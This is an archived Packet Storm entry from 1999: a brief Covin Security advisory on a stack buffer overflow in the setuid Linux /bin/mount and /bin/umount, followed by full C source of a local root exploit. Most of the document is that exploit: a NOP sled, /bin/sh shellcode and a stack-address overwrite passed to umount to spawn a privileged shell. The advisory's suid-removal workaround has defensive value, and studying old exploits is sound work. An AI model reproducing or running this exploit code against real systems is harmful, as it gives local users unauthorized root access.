cvnmount.exploit

1999-08-17T00:00:00
ID PACKETSTORM:15132
Type packetstorm
Reporter Packet Storm
Modified 1999-08-17T00:00:00

Description

                                        
                                            `Covin Security Releases:  
(mount bufferoverflow exploit v1.0)  
  
Tested operated systems: All current distributions of Linux  
  
Affect: Local users on systems affected can gain overflow mounts syntax  
buffer and execute a shell by overwriting the stack.  
  
Affected binaries:  
(/bin/mount and /bin/umount)  
  
Workaround:  
On all current distributions of Linux remove suid bit of /bin/mount and  
/bin/umount.  
[chmod -s /bin/mount;chmod -s /bin/umount]  
  
Remarks:  
For gods sake, how many more times are we gonna see this kind of problem?  
It's been with Linux since it's very beggining, and it's so easy to  
exploit. Similiar buffer overflow vulnerabilities have been found in  
Linux distributions many times before, splitvt, dip, just to name a few  
examples.  
  
  
Any remarks, notes or other forms of feedback may be redirected to:  
bloodmask@mymail.com  
<------------------------------[ Cut here ]---------------------------------->  
  
/* Mount Exploit for Linux, Jul 30 1996  
  
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::  
::::::::""`````""::::::""`````""::"```":::'"```'.g$$S$' `````````"":::::::::  
:::::'.g#S$$"$$S#n. .g#S$$"$$S#n. $$$S#s s#S$$$ $$$$S". $$$$$$"$$S#n.`::::::  
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ .g#S$$$ $$$$$$ $$$$$$ ::::::  
::::: $$$$$$ gggggg $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::  
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::  
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::  
::::: $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$ $$$$$$$ $$$$$$ $$$$$$ ::::::  
::::::`S$$$$s$$$$S' `S$$$$s$$$$S' `S$$$$s$$$$S' $$$$$$$ $$$$$$ $$$$$$ ::::::  
:::::::...........:::...........:::...........::.......:......:.......::::::  
:::::::::::::::::::::::::::::::::::::::::::::::;::::::::::::::::::::::::::::  
  
Discovered and Coded by Bloodmask & Vio  
Covin Security 1996  
*/  
  
#include <unistd.h>  
#include <stdio.h>  
#include <stdlib.h>  
#include <fcntl.h>  
#include <sys/stat.h>  
  
#define PATH_MOUNT "/bin/umount"  
#define BUFFER_SIZE 1024  
#define DEFAULT_OFFSET 50  
  
u_long get_esp()  
{  
__asm__("movl %esp, %eax");  
  
}  
  
main(int argc, char **argv)  
{  
u_char execshell[] =  
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"  
"\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"  
"\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";  
  
char *buff = NULL;  
unsigned long *addr_ptr = NULL;  
char *ptr = NULL;  
  
int i;  
int ofs = DEFAULT_OFFSET;  
  
buff = malloc(4096);  
if(!buff)  
{  
printf("can't allocate memory\n");  
exit(0);  
}  
ptr = buff;  
  
/* fill start of buffer with nops */  
  
memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));  
ptr += BUFFER_SIZE-strlen(execshell);  
  
/* stick asm code into the buffer */  
  
for(i=0;i < strlen(execshell);i++)  
*(ptr++) = execshell[i];  
  
addr_ptr = (long *)ptr;  
for(i=0;i < (8/4);i++)  
*(addr_ptr++) = get_esp() + ofs;  
ptr = (char *)addr_ptr;  
*ptr = 0;  
  
(void)alarm((u_int)0);  
printf("Discovered and Coded by Bloodmask and Vio, Covin 1996\n");  
execl(PATH_MOUNT, "mount", buff, NULL);  
}  
  
  
`